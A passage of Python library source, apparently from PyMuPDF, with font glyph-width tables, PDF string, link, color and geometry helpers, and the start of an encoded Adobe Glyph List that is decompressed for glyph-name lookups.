(117, 0.788),
(118, 0.784),
(119, 0.438),
(120, 0.138),
(121, 0.277),
(122, 0.415),
(123, 0.392),
(124, 0.392),
(125, 0.668),
(126, 0.668),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(161, 0.732),
(162, 0.544),
(163, 0.544),
(164, 0.91),
(165, 0.667),
(166, 0.76),
(167, 0.76),
(168, 0.776),
(169, 0.595),
(170, 0.694),
(171, 0.626),
(172, 0.788),
(173, 0.788),
(174, 0.788),
(175, 0.788),
(176, 0.788),
(177, 0.788),
(178, 0.788),
(179, 0.788),
(180, 0.788),
(181, 0.788),
(182, 0.788),
(183, 0.788),
(184, 0.788),
(185, 0.788),
(186, 0.788),
(187, 0.788),
(188, 0.788),
(189, 0.788),
(190, 0.788),
(191, 0.788),
(192, 0.788),
(193, 0.788),
(194, 0.788),
(195, 0.788),
(196, 0.788),
(197, 0.788),
(198, 0.788),
(199, 0.788),
(200, 0.788),
(201, 0.788),
(202, 0.788),
(203, 0.788),
(204, 0.788),
(205, 0.788),
(206, 0.788),
(207, 0.788),
(208, 0.788),
(209, 0.788),
(210, 0.788),
(211, 0.788),
(212, 0.894),
(213, 0.838),
(214, 1.016),
(215, 0.458),
(216, 0.748),
(217, 0.924),
(218, 0.748),
(219, 0.918),
(220, 0.927),
(221, 0.928),
(222, 0.928),
(223, 0.834),
(224, 0.873),
(225, 0.828),
(226, 0.924),
(227, 0.924),
(228, 0.917),
(229, 0.93),
(230, 0.931),
(231, 0.463),
(232, 0.883),
(233, 0.836),
(234, 0.836),
(235, 0.867),
(236, 0.867),
(237, 0.696),
(238, 0.696),
(239, 0.874),
(183, 0.788),
(241, 0.874),
(242, 0.76),
(243, 0.946),
(244, 0.771),
(245, 0.865),
(246, 0.771),
(247, 0.888),
(248, 0.967),
(249, 0.888),
(250, 0.831),
(251, 0.873),
(252, 0.927),
(253, 0.97),
(183, 0.788),
(183, 0.788),
)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'Symbol'
# ------------------------------------------------------------------------------
symbol_glyphs = (
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(32, 0.25),
(33, 0.333),
(34, 0.713),
(35, 0.5),
(36, 0.549),
(37, 0.833),
(38, 0.778),
(39, 0.439),
(40, 0.333),
(41, 0.333),
(42, 0.5),
(43, 0.549),
(44, 0.25),
(45, 0.549),
(46, 0.25),
(47, 0.278),
(48, 0.5),
(49, 0.5),
(50, 0.5),
(51, 0.5),
(52, 0.5),
(53, 0.5),
(54, 0.5),
(55, 0.5),
(56, 0.5),
(57, 0.5),
(58, 0.278),
(59, 0.278),
(60, 0.549),
(61, 0.549),
(62, 0.549),
(63, 0.444),
(64, 0.549),
(65, 0.722),
(66, 0.667),
(67, 0.722),
(68, 0.612),
(69, 0.611),
(70, 0.763),
(71, 0.603),
(72, 0.722),
(73, 0.333),
(74, 0.631),
(75, 0.722),
(76, 0.686),
(77, 0.889),
(78, 0.722),
(79, 0.722),
(80, 0.768),
(81, 0.741),
(82, 0.556),
(83, 0.592),
(84, 0.611),
(85, 0.69),
(86, 0.439),
(87, 0.768),
(88, 0.645),
(89, 0.795),
(90, 0.611),
(91, 0.333),
(92, 0.863),
(93, 0.333),
(94, 0.658),
(95, 0.5),
(96, 0.5),
(97, 0.631),
(98, 0.549),
(99, 0.549),
(100, 0.494),
(101, 0.439),
(102, 0.521),
(103, 0.411),
(104, 0.603),
(105, 0.329),
(106, 0.603),
(107, 0.549),
(108, 0.549),
(109, 0.576),
(110, 0.521),
(111, 0.549),
(112, 0.549),
(113, 0.521),
(114, 0.549),
(115, 0.603),
(116, 0.439),
(117, 0.576),
(118, 0.713),
(119, 0.686),
(120, 0.493),
(121, 0.686),
(122, 0.494),
(123, 0.48),
(124, 0.2),
(125, 0.48),
(126, 0.549),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(160, 0.25),
(161, 0.62),
(162, 0.247),
(163, 0.549),
(164, 0.167),
(165, 0.713),
(166, 0.5),
(167, 0.753),
(168, 0.753),
(169, 0.753),
(170, 0.753),
(171, 1.042),
(172, 0.713),
(173, 0.603),
(174, 0.987),
(175, 0.603),
(176, 0.4),
(177, 0.549),
(178, 0.411),
(179, 0.549),
(180, 0.549),
(181, 0.576),
(182, 0.494),
(183, 0.46),
(184, 0.549),
(185, 0.549),
(186, 0.549),
(187, 0.549),
(188, 1),
(189, 0.603),
(190, 1),
(191, 0.658),
(192, 0.823),
(193, 0.686),
(194, 0.795),
(195, 0.987),
(196, 0.768),
(197, 0.768),
(198, 0.823),
(199, 0.768),
(200, 0.768),
(201, 0.713),
(202, 0.713),
(203, 0.713),
(204, 0.713),
(205, 0.713),
(206, 0.713),
(207, 0.713),
(208, 0.768),
(209, 0.713),
(210, 0.79),
(211, 0.79),
(212, 0.89),
(213, 0.823),
(214, 0.549),
(215, 0.549),
(216, 0.713),
(217, 0.603),
(218, 0.603),
(219, 1.042),
(220, 0.987),
(221, 0.603),
(222, 0.987),
(223, 0.603),
(224, 0.494),
(225, 0.329),
(226, 0.79),
(227, 0.79),
(228, 0.786),
(229, 0.713),
(230, 0.384),
(231, 0.384),
(232, 0.384),
(233, 0.384),
(234, 0.384),
(235, 0.384),
(236, 0.494),
(237, 0.494),
(238, 0.494),
(239, 0.494),
(183, 0.46),
(241, 0.329),
(242, 0.274),
(243, 0.686),
(244, 0.686),
(245, 0.686),
(246, 0.384),
(247, 0.549),
(248, 0.384),
(249, 0.384),
(250, 0.384),
(251, 0.384),
(252, 0.494),
(253, 0.494),
(254, 0.494),
(183, 0.46),
)
class linkDest(object):
"""link or outline destination details"""
def __init__(self, obj, rlink):
isExt = obj.is_external
isInt = not isExt
self.dest = ""
self.fileSpec = ""
self.flags = 0
self.isMap = False
self.isUri = False
self.kind = LINK_NONE
self.lt = Point(0, 0)
self.named = ""
self.newWindow = ""
self.page = obj.page
self.rb = Point(0, 0)
self.uri = obj.uri
if rlink and not self.uri.startswith("#"):
self.uri = "#page=%i&zoom=0,%g,%g" % (rlink[0] + 1, rlink[1], rlink[2])
if obj.is_external:
self.page = -1
self.kind = LINK_URI
if not self.uri:
self.page = -1
self.kind = LINK_NONE
if isInt and self.uri:
self.uri = self.uri.replace("&zoom=nan", "&zoom=0")
if self.uri.startswith("#"):
self.named = ""
self.kind = LINK_GOTO
m = re.match('^#page=([0-9]+)&zoom=([0-9.]+),(-?[0-9.]+),(-?[0-9.]+)$', self.uri)
if m:
self.page = int(m.group(1)) - 1
self.lt = Point(float((m.group(3))), float(m.group(4)))
self.flags = self.flags | LINK_FLAG_L_VALID | LINK_FLAG_T_VALID
else:
m = re.match('^#page=([0-9]+)$', self.uri)
if m:
self.page = int(m.group(1)) - 1
else:
self.kind = LINK_NAMED
self.named = self.uri[1:]
else:
self.kind = LINK_NAMED
self.named = self.uri
if obj.is_external:
if self.uri.startswith(("http://", "https://", "mailto:", "ftp://")):
self.isUri = True
self.kind = LINK_URI
elif self.uri.startswith("file://"):
self.fileSpec = self.uri[7:]
self.isUri = False
self.uri = ""
self.kind = LINK_LAUNCH
ftab = self.fileSpec.split("#")
if len(ftab) == 2:
if ftab[1].startswith("page="):
self.kind = LINK_GOTOR
self.fileSpec = ftab[0]
self.page = int(ftab[1][5:]) - 1
else:
self.isUri = True
self.kind = LINK_LAUNCH
# -------------------------------------------------------------------------------
# "Now" timestamp in PDF Format
# -------------------------------------------------------------------------------
def get_pdf_now() -> str:
import time
tz = "%s'%s'" % (
str(abs(time.altzone // 3600)).rjust(2, "0"),
str((abs(time.altzone // 60) % 60)).rjust(2, "0"),
)
tstamp = time.strftime("D:%Y%m%d%H%M%S", time.localtime())
if time.altzone > 0:
tstamp += "-" + tz
elif time.altzone < 0:
tstamp += "+" + tz
else:
pass
return tstamp
def get_pdf_str(s: str) -> str:
""" Return a PDF string depending on its coding.
Notes:
Returns a string bracketed with either "()" or "<>" for hex values.
If only ascii then "(original)" is returned, else if only 8 bit chars
then "(original)" with interspersed octal strings \nnn is returned,
else a string "<FEFF[hexstring]>" is returned, where [hexstring] is the
UTF-16BE encoding of the original.
"""
if not bool(s):
return "()"
def make_utf16be(s):
r = bytearray([254, 255]) + bytearray(s, "UTF-16BE")
return "<" + r.hex() + ">" # brackets indicate hex
# The following either returns the original string with mixed-in
# octal numbers \nnn for chars outside the ASCII range, or returns
# the UTF-16BE BOM version of the string.
r = ""
for c in s:
oc = ord(c)
if oc > 255: # shortcut if beyond 8-bit code range
return make_utf16be(s)
if oc > 31 and oc < 127: # in ASCII range
if c in ("(", ")", "\\"): # these need to be escaped
r += "\\"
r += c
continue
if oc > 127: # beyond ASCII
r += "\\%03o" % oc
continue
# now the white spaces
if oc == 8: # backspace
r += "\\b"
elif oc == 9: # tab
r += "\\t"
elif oc == 10: # line feed
r += "\\n"
elif oc == 12: # form feed
r += "\\f"
elif oc == 13: # carriage return
r += "\\r"
else:
r += "\\267" # unsupported: replace by 0xB7
return "(" + r + ")"
def getTJstr(text: str, glyphs: typing.Union[list, tuple, None], simple: bool, ordering: int) -> str:
""" Return a PDF string enclosed in [] brackets, suitable for the PDF TJ
operator.
Notes:
The input string is converted to either 2 or 4 hex digits per character.
Args:
simple: no glyphs: 2-chars, use char codes as the glyph
glyphs: 2-chars, use glyphs instead of char codes (Symbol,
ZapfDingbats)
not simple: ordering < 0: 4-chars, use glyphs not char codes
ordering >=0: a CJK font! 4 chars, use char codes as glyphs
"""
if text.startswith("[<") and text.endswith(">]"): # already done
return text
if not bool(text):
return "[<>]"
if simple: # each char or its glyph is coded as a 2-byte hex
if glyphs is None: # not Symbol, not ZapfDingbats: use char code
otxt = "".join(["%02x" % ord(c) if ord(c) < 256 else "b7" for c in text])
else: # Symbol or ZapfDingbats: use glyphs
otxt = "".join(
["%02x" % glyphs[ord(c)][0] if ord(c) < 256 else "b7" for c in text]
)
return "[<" + otxt + ">]"
# non-simple fonts: each char or its glyph is coded as 4-byte hex
if ordering < 0: # not a CJK font: use the glyphs
otxt = "".join(["%04x" % glyphs[ord(c)][0] for c in text])
else: # CJK: use the char codes
otxt = "".join(["%04x" % ord(c) for c in text])
return "[<" + otxt + ">]"
def paper_sizes():
"""Known paper formats @ 72 dpi as a dictionary. Key is the format string
like "a4" for ISO-A4. Value is the tuple (width, height).
Information taken from the following web sites:
www.din-formate.de
www.din-formate.info/amerikanische-formate.html
www.directtools.de/wissen/normen/iso.htm
"""
return {
"a0": (2384, 3370),
"a1": (1684, 2384),
"a10": (74, 105),
"a2": (1191, 1684),
"a3": (842, 1191),
"a4": (595, 842),
"a5": (420, 595),
"a6": (298, 420),
"a7": (210, 298),
"a8": (147, 210),
"a9": (105, 147),
"b0": (2835, 4008),
"b1": (2004, 2835),
"b10": (88, 125),
"b2": (1417, 2004),
"b3": (1001, 1417),
"b4": (709, 1001),
"b5": (499, 709),
"b6": (354, 499),
"b7": (249, 354),
"b8": (176, 249),
"b9": (125, 176),
"c0": (2599, 3677),
"c1": (1837, 2599),
"c10": (79, 113),
"c2": (1298, 1837),
"c3": (918, 1298),
"c4": (649, 918),
"c5": (459, 649),
"c6": (323, 459),
"c7": (230, 323),
"c8": (162, 230),
"c9": (113, 162),
"card-4x6": (288, 432),
"card-5x7": (360, 504),
"commercial": (297, 684),
"executive": (522, 756),
"invoice": (396, 612),
"ledger": (792, 1224),
"legal": (612, 1008),
"legal-13": (612, 936),
"letter": (612, 792),
"monarch": (279, 540),
"tabloid-extra": (864, 1296),
}
def paper_size(s: str) -> tuple:
"""Return a tuple (width, height) for a given paper format string.
Notes:
'A4-L' will return (842, 595), the values for A4 landscape.
Suffix '-P' and no suffix return the portrait tuple.
"""
size = s.lower()
f = "p"
if size.endswith("-l"):
f = "l"
size = size[:-2]
if size.endswith("-p"):
size = size[:-2]
rc = paper_sizes().get(size, (-1, -1))
if f == "p":
return rc
return (rc[1], rc[0])
def paper_rect(s: str) -> Rect:
"""Return a Rect for the paper size indicated in string 's'. Must conform to the argument of method 'PaperSize', which will be invoked.
"""
width, height = paper_size(s)
return Rect(0.0, 0.0, width, height)
def CheckParent(o: typing.Any):
if getattr(o, "parent", None) == None:
raise ValueError("orphaned object: parent is None")
def EnsureOwnership(o: typing.Any):
if not getattr(o, "thisown", False):
raise RuntimeError("object destroyed")
def CheckColor(c: OptSeq):
if c:
if (
type(c) not in (list, tuple)
or len(c) not in (1, 3, 4)
or min(c) < 0
or max(c) > 1
):
raise ValueError("need 1, 3 or 4 color components in range 0 to 1")
def ColorCode(c: typing.Union[list, tuple, float, None], f: str) -> str:
if not c:
return ""
if hasattr(c, "__float__"):
c = (c,)
CheckColor(c)
if len(c) == 1:
s = "%g " % c[0]
return s + "G " if f == "c" else s + "g "
if len(c) == 3:
s = "%g %g %g " % tuple(c)
return s + "RG " if f == "c" else s + "rg "
s = "%g %g %g %g " % tuple(c)
return s + "K " if f == "c" else s + "k "
def JM_TUPLE(o: typing.Sequence) -> tuple:
return tuple(map(lambda x: round(x, 5) if abs(x) >= 1e-4 else 0, o))
def JM_TUPLE3(o: typing.Sequence) -> tuple:
return tuple(map(lambda x: round(x, 3) if abs(x) >= 1e-3 else 0, o))
def CheckRect(r: typing.Any) -> bool:
"""Check whether an object is non-degenerate rect-like.
It must be a sequence of 4 numbers.
"""
try:
r = Rect(r)
except:
return False
return not (r.is_empty or r.is_infinite)
def CheckQuad(q: typing.Any) -> bool:
"""Check whether an object is convex, not empty quad-like.
It must be a sequence of 4 number pairs.
"""
try:
q0 = Quad(q)
except:
return False
return q0.is_convex
def CheckMarkerArg(quads: typing.Any) -> tuple:
if CheckRect(quads):
r = Rect(quads)
return (r.quad,)
if CheckQuad(quads):
return (quads,)
for q in quads:
if not (CheckRect(q) or CheckQuad(q)):
raise ValueError("bad quads entry")
return quads
def CheckMorph(o: typing.Any) -> bool:
if not bool(o):
return False
if not (type(o) in (list, tuple) and len(o) == 2):
raise ValueError("morph must be a sequence of length 2")
if not (len(o[0]) == 2 and len(o[1]) == 6):
raise ValueError("invalid morph parm 0")
if not o[1][4] == o[1][5] == 0:
raise ValueError("invalid morph parm 1")
return True
def CheckFont(page: "struct Page *", fontname: str) -> tuple:
"""Return an entry in the page's font list if reference name matches.
"""
for f in page.get_fonts():
if f[4] == fontname:
return f
def CheckFontInfo(doc: "struct Document *", xref: int) -> list:
"""Return a font info if present in the document.
"""
for f in doc.FontInfos:
if xref == f[0]:
return f
def UpdateFontInfo(doc: "struct Document *", info: typing.Sequence):
xref = info[0]
found = False
for i, fi in enumerate(doc.FontInfos):
if fi[0] == xref:
found = True
break
if found:
doc.FontInfos[i] = info
else:
doc.FontInfos.append(info)
def DUMMY(*args, **kw):
return
def planish_line(p1: point_like, p2: point_like) -> Matrix:
"""Compute matrix which maps line from p1 to p2 to the x-axis, such that it
maintains its length and p1 * matrix = Point(0, 0).
Args:
p1, p2: point_like
Returns:
Matrix which maps p1 to Point(0, 0) and p2 to a point on the x axis at
the same distance to Point(0,0). Will always combine a rotation and a
transformation.
"""
p1 = Point(p1)
p2 = Point(p2)
return Matrix(util_hor_matrix(p1, p2))
def image_profile(img: typing.ByteString) -> dict:
""" Return basic properties of an image.
Args:
img: bytes, bytearray, io.BytesIO object or an opened image file.
Returns:
A dictionary with keys width, height, colorspace.n, bpc, type, ext and size,
where 'type' is the MuPDF image type (0 to 14) and 'ext' the suitable
file extension.
"""
if type(img) is io.BytesIO:
stream = img.getvalue()
elif hasattr(img, "read"):
stream = img.read()
elif type(img) in (bytes, bytearray):
stream = img
else:
raise ValueError("bad argument 'img'")
return TOOLS.image_profile(stream)
def ConversionHeader(i: str, filename: OptStr ="unknown"):
t = i.lower()
html = """<!DOCTYPE html>
<html>
<head>
<style>
body{background-color:gray}
div{position:relative;background-color:white;margin:1em auto}
p{position:absolute;margin:0}
img{position:absolute}
</style>
</head>
<body>\n"""
xml = (
"""<?xml version="1.0"?>
<document name="%s">\n"""
% filename
)
xhtml = """<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body{background-color:gray}
div{background-color:white;margin:1em;padding:1em}
p{white-space:pre-wrap}
</style>
</head>
<body>\n"""
text = ""
json = '{"document": "%s", "pages": [\n' % filename
if t == "html":
r = html
elif t == "json":
r = json
elif t == "xml":
r = xml
elif t == "xhtml":
r = xhtml
else:
r = text
return r
def ConversionTrailer(i: str):
t = i.lower()
text = ""
json = "]\n}"
html = "</body>\n</html>\n"
xml = "</document>\n"
xhtml = html
if t == "html":
r = html
elif t == "json":
r = json
elif t == "xml":
r = xml
elif t == "xhtml":
r = xhtml
else:
r = text
return r
class ElementPosition(object):
"""Convert a dictionary with element position information to an object."""
def __init__(self):
pass
def __str__(self):
ret = ""
for n, v in self.__dict__.items():
ret += f" {n}={v!r}"
return ret
def make_story_elpos():
return ElementPosition()
def get_highlight_selection(page, start: point_like =None, stop: point_like =None, clip: rect_like =None) -> list:
"""Return rectangles of text lines between two points.
Notes:
The default of 'start' is top-left of 'clip'. The default of 'stop'
is bottom-reight of 'clip'.
Args:
start: start point_like
stop: end point_like, must be 'below' start
clip: consider this rect_like only, default is page rectangle
Returns:
List of line bbox intersections with the area established by the
parameters.
"""
# validate and normalize arguments
if clip is None:
clip = page.rect
clip = Rect(clip)
if start is None:
start = clip.tl
if stop is None:
stop = clip.br
clip.y0 = start.y
clip.y1 = stop.y
if clip.is_empty or clip.is_infinite:
return []
# extract text of page, clip only, no images, expand ligatures
blocks = page.get_text(
"dict", flags=0, clip=clip,
)["blocks"]
lines = [] # will return this list of rectangles
for b in blocks:
bbox = Rect(b["bbox"])
if bbox.is_infinite or bbox.is_empty:
continue
for line in b["lines"]:
bbox = Rect(line["bbox"])
if bbox.is_infinite or bbox.is_empty:
continue
lines.append(bbox)
if lines == []: # did not select anything
return lines
lines.sort(key=lambda bbox: bbox.y1) # sort by vertical positions
# cut off prefix from first line if start point is close to its top
bboxf = lines.pop(0)
if bboxf.y0 - start.y <= 0.1 * bboxf.height: # close enough?
r = Rect(start.x, bboxf.y0, bboxf.br) # intersection rectangle
if not (r.is_empty or r.is_infinite):
lines.insert(0, r) # insert again if not empty
else:
lines.insert(0, bboxf) # insert again
if lines == []: # the list might have been emptied
return lines
# cut off suffix from last line if stop point is close to its bottom
bboxl = lines.pop()
if stop.y - bboxl.y1 <= 0.1 * bboxl.height: # close enough?
r = Rect(bboxl.tl, stop.x, bboxl.y1) # intersection rectangle
if not (r.is_empty or r.is_infinite):
lines.append(r) # append if not empty
else:
lines.append(bboxl) # append again
return lines
def annot_preprocess(page: "Page") -> int:
"""Prepare for annotation insertion on the page.
Returns:
Old page rotation value. Temporarily sets rotation to 0 when required.
"""
CheckParent(page)
if not page.parent.is_pdf:
raise ValueError("is no PDF")
old_rotation = page.rotation
if old_rotation != 0:
page.set_rotation(0)
return old_rotation
def annot_postprocess(page: "Page", annot: "Annot") -> None:
"""Clean up after annotation inertion.
Set ownership flag and store annotation in page annotation dictionary.
"""
annot.parent = weakref.proxy(page)
page._annot_refs[id(annot)] = annot
annot.thisown = True
def sRGB_to_rgb(srgb: int) -> tuple:
"""Convert sRGB color code to an RGB color triple.
There is **no error checking** for performance reasons!
Args:
srgb: (int) RRGGBB (red, green, blue), each color in range(255).
Returns:
Tuple (red, green, blue) each item in intervall 0 <= item <= 255.
"""
r = srgb >> 16
g = (srgb - (r << 16)) >> 8
b = srgb - (r << 16) - (g << 8)
return (r, g, b)
def sRGB_to_pdf(srgb: int) -> tuple:
"""Convert sRGB color code to a PDF color triple.
There is **no error checking** for performance reasons!
Args:
srgb: (int) RRGGBB (red, green, blue), each color in range(255).
Returns:
Tuple (red, green, blue) each item in intervall 0 <= item <= 1.
"""
t = sRGB_to_rgb(srgb)
return t[0] / 255.0, t[1] / 255.0, t[2] / 255.0
def make_table(rect: rect_like =(0, 0, 1, 1), cols: int =1, rows: int =1) -> list:
"""Return a list of (rows x cols) equal sized rectangles.
Notes:
A utility to fill a given area with table cells of equal size.
Args:
rect: rect_like to use as the table area
rows: number of rows
cols: number of columns
Returns:
A list with <rows> items, where each item is a list of <cols>
PyMuPDF Rect objects of equal sizes.
"""
rect = Rect(rect) # ensure this is a Rect
if rect.is_empty or rect.is_infinite:
raise ValueError("rect must be finite and not empty")
tl = rect.tl
height = rect.height / rows # height of one table cell
width = rect.width / cols # width of one table cell
delta_h = (width, 0, width, 0) # diff to next right rect
delta_v = (0, height, 0, height) # diff to next lower rect
r = Rect(tl, tl.x + width, tl.y + height) # first rectangle
# make the first row
row = [r]
for i in range(1, cols):
r += delta_h # build next rect to the right
row.append(r)
# make result, starts with first row
rects = [row]
for i in range(1, rows):
row = rects[i - 1] # take previously appended row
nrow = [] # the new row to append
for r in row: # for each previous cell add its downward copy
nrow.append(r + delta_v)
rects.append(nrow) # append new row to result
return rects
def repair_mono_font(page: "Page", font: "Font") -> None:
"""Repair character spacing for mono fonts.
Notes:
Some mono-spaced fonts are displayed with a too large character
width, e.g. "a b c" instead of "abc". This utility adds an entry
"/DW w" to the descendent font of font. The int w is
taken to be the first width > 0 of the font's unicodes.
This should enforce viewers to use 'w' as the character width.
Args:
page: fitz.Page object.
font: fitz.Font object.
"""
def set_font_width(doc, xref, width):
df = doc.xref_get_key(xref, "DescendantFonts")
if df[0] != "array":
return False
df_xref = int(df[1][1:-1].replace("0 R",""))
W = doc.xref_get_key(df_xref, "W")
if W[1] != "null":
doc.xref_set_key(df_xref, "W", "null")
doc.xref_set_key(df_xref, "DW", str(width))
return True
if not font.flags["mono"]: # font not flagged as monospaced
return None
doc = page.parent # the document
fontlist = page.get_fonts() # list of fonts on page
xrefs = [ # list of objects referring to font
f[0]
for f in fontlist
if (f[3] == font.name and f[4].startswith("F") and f[5].startswith("Identity"))
]
if xrefs == []: # our font does not occur
return
xrefs = set(xrefs) # drop any double counts
maxadv = max([font.glyph_advance(cp) for cp in font.valid_codepoints()[:3]])
width = int(round((maxadv * 1000)))
for xref in xrefs:
if not set_font_width(doc, xref, width):
print("Cannot set width for '%s' in xref %i" % (font.name, xref))
# Adobe Glyph List functions
import base64, gzip
_adobe_glyphs = {}
_adobe_unicodes = {}
def unicode_to_glyph_name(ch: int) -> str:
if _adobe_glyphs == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
name, unc = line.split(";")
uncl = unc.split()
for unc in uncl:
c = int(unc[:4], base=16)
_adobe_glyphs[c] = name
return _adobe_glyphs.get(ch, ".notdef")
def glyph_name_to_unicode(name: str) -> int:
if _adobe_unicodes == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
gname, unc = line.split(";")
c = int(unc[:4], base=16)
_adobe_unicodes[gname] = c
return _adobe_unicodes.get(name, 65533)
def adobe_glyph_names() -> tuple:
if _adobe_unicodes == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
gname, unc = line.split(";")
c = int("0x" + unc[:4], base=16)
_adobe_unicodes[gname] = c
return tuple(_adobe_unicodes.keys())
def adobe_glyph_unicodes() -> tuple:
if _adobe_unicodes == {}:
for line in _get_glyph_text():
if line.startswith("#"):
continue
gname, unc = line.split(";")
c = int("0x" + unc[:4], base=16)
_adobe_unicodes[gname] = c
return tuple(_adobe_unicodes.values())
def _get_glyph_text() -> bytes:
return gzip.decompress(base64.b64decode(
b'H4sIABmRaF8C/7W9SZfjRpI1useviPP15utzqroJgBjYWhEkKGWVlKnOoapVO0YQEYSCJE'
b'IcMhT569+9Ppibg8xevHdeSpmEXfPBfDZ3N3f/t7u//r//k/zb3WJ4eTv2T9vzXTaZZH/N'
b'Junsbr4Z7ru7/7s9n1/+6z//8/X19T/WRP7jYdj/57//R/Jv8Pax2/Sn87G/v5z74XC3Pm'
b'zuLqfurj/cnYbL8aEzyH1/WB/f7h6H4/70l7vX/ry9G47wzK/hcr7bD5v+sX9YM4i/3K2P'
b'3d1Ld9z353O3uXs5Dl/7DT7O2/UZ/3Tw9zjsdsNrf3i6exgOm57eTsbbvjv/1w2xTnfDo5'
b'fnYdjA3eV0vjt25zXkRJB36/vhKwN+kEw4DOf+ofsLuP3pboewGISO7bAxPkUU+EaUD7t1'
b'v++O/3FTCESmcsILgQRuLhDs/w857lz6NsPDZd8dzmtfSP85HO8GcI53+/W5O/br3QkeJa'
b'9NERmPKgE2Ue+73vgj97Ded5TH1pPDEFCT4/35RFFtAMORMezXb3dwiioCsYe77rABjjCO'
b'jHs/nLs7mx3wuYFYX+HsEQyTfHg/DY/nVxa0rzmnl+6BVQfeegTyemSlOdjqczqJ0J9/ev'
b'fp7tOH1ed/zj+2d/j+9eOHf7xbtsu75jcw27vFh19/+/jux58+3/304edl+/HT3fz9kq3i'
b'w/vPH981Xz5/APR/5p/g9/+Qhb+/3bX/8+vH9tOnuw8f79798uvP7xAcwv84f//5XfvpL/'
b'D97v3i5y/Ld+9//Msdgrh7/+Hz3c/vfnn3GQ4/f/iLifja492HFbz+0n5c/ARg3rz7+d3n'
b'30ycq3ef3zO+FSKc3/06//j53eLLz/OPd79++fjrh0/tHRIHr8t3nxY/z9/90i7/AxIg1r'
b'v2H+37z3effpr//PPN1CIF47Q2LUSdNz+3NjakdvnuY7v4/BcEGb4WyEPI+DMT++nXdvEO'
b'n8iWFomaf/ztL8wZhPqp/e8vcAbm3XL+y/xHpPH/xlnDejXKHJTQ4svH9hdK/mF19+lL8+'
b'nzu89fPrd3P374sDSZ/qn9+I93i/bTD/D+8wcWxOruy6f2L4jl89xEjkCQaZ9+4Hfz5dM7'
b'k33v3n9uP3788uvndx/e/zu8/vThn8ggSDqH56XJ6Q/vTZKRVx8+/sZgmRemIP5y98+fWu'
b'Ao8vc+z+bMjE/Iu8Vn7RBxIis/q7TevW9//Pndj+37RWuz/AND+ue7T+2/o+zefaKTdzbq'
b'f84R7xeTdJYYJLOf7z4xq11N/osp2bt3q7v58h/vKLxzjtrw6Z2rOSbzFj+5rEd7+P84UL'
b'xH8/6vO/lj2/6Pu7eX7d3P6C3Y2tb3u+7ua3dkA/yvu+w/JqyV6GeUt0/dy7nb36MjySZ/'
b'MUMO3Hz5+LNycsdx54SB5wmN/XJvRh0z/vz1/PaCf4Zhd/rP9dPur/j7eDDtfIV+dX3+r7'
b'vz63B36vb9w7AbDn/ddLseown7kr7bbU4YIhD6/03//e7JiM0O669/vbyg1/hPdKLd8WGN'
b'PmnXoSs52h5200OGk/WW/fvdl0NvhpHTw3q3Pt59Xe8uCOARA8ydCcX433Z/rjfonfbrnf'
b'hP5j9MJtM0mbf4XZT4XT9czt0Pk3S1ALFfPxyHA6g2A3WCz90Pq6qFO+dsskjdtzAB3B+7'
b'rwwDeWi/reu0nbcOeMBostv1Dz9MpsuJwzbD+b5DcuGuKR32dFx/pcfGO9oOw7MZlAj64M'
b'/9bmOAaTJ/WFuJF0t898eHXfdDNmV4JC77x133J8XONCDiTTWq5JkvNMMLNY9C1ZLNa82R'
b'rIki9ULP50AZ/6pczOyn92DSE3IqRSZs7nc2+gmqKMi+O3an/sQkTQOpszcLsBTnsg2gSE'
b'f/KskTQ4YaANrFPFn4b/ELIEo/Iu2jQkbg/QEtEJXe1Y6MtWP3sl3/MMlnqf08D4cBaclr'
b'5KzEzHTuyXhZPyCXVhkcD0/DoXsmEwEfoWVQqsJ+Sg2eW9qniOGQFqHh3n+XCNMWCMLJ3b'
b'c4BPB2vz5CYenXkKjI06Rhu8mSJlSxKmmQX+uHB6g1jC0ztEQ+TRqdISmC6A46TLiH/sfM'
b'wBczE0mo4WrXHzoJpUyaKCvglLnpJC1XiEWSBN55eIHcDChLFpQ4TxZrHWkL2mUXwl6Yto'
b'N6OLefEmyRLHy7mizwDT1yt1szryqhfCOa1AJJBtKVZFRtCd8WU3pATvFrbr5cHlo6Dome'
b'tzoF0xmAbn3/vF2fgKgcbhbkKCCrCKBYETp0uZt+2siJ5pSGc92+kOVgbLVIOREE/rw+jc'
b'JfNGSxGWBysYMmOzxrCU3qelSBOUV1VQCf456kXEGaqB4gykGJUKTJQupBnixZ9NNk+S+2'
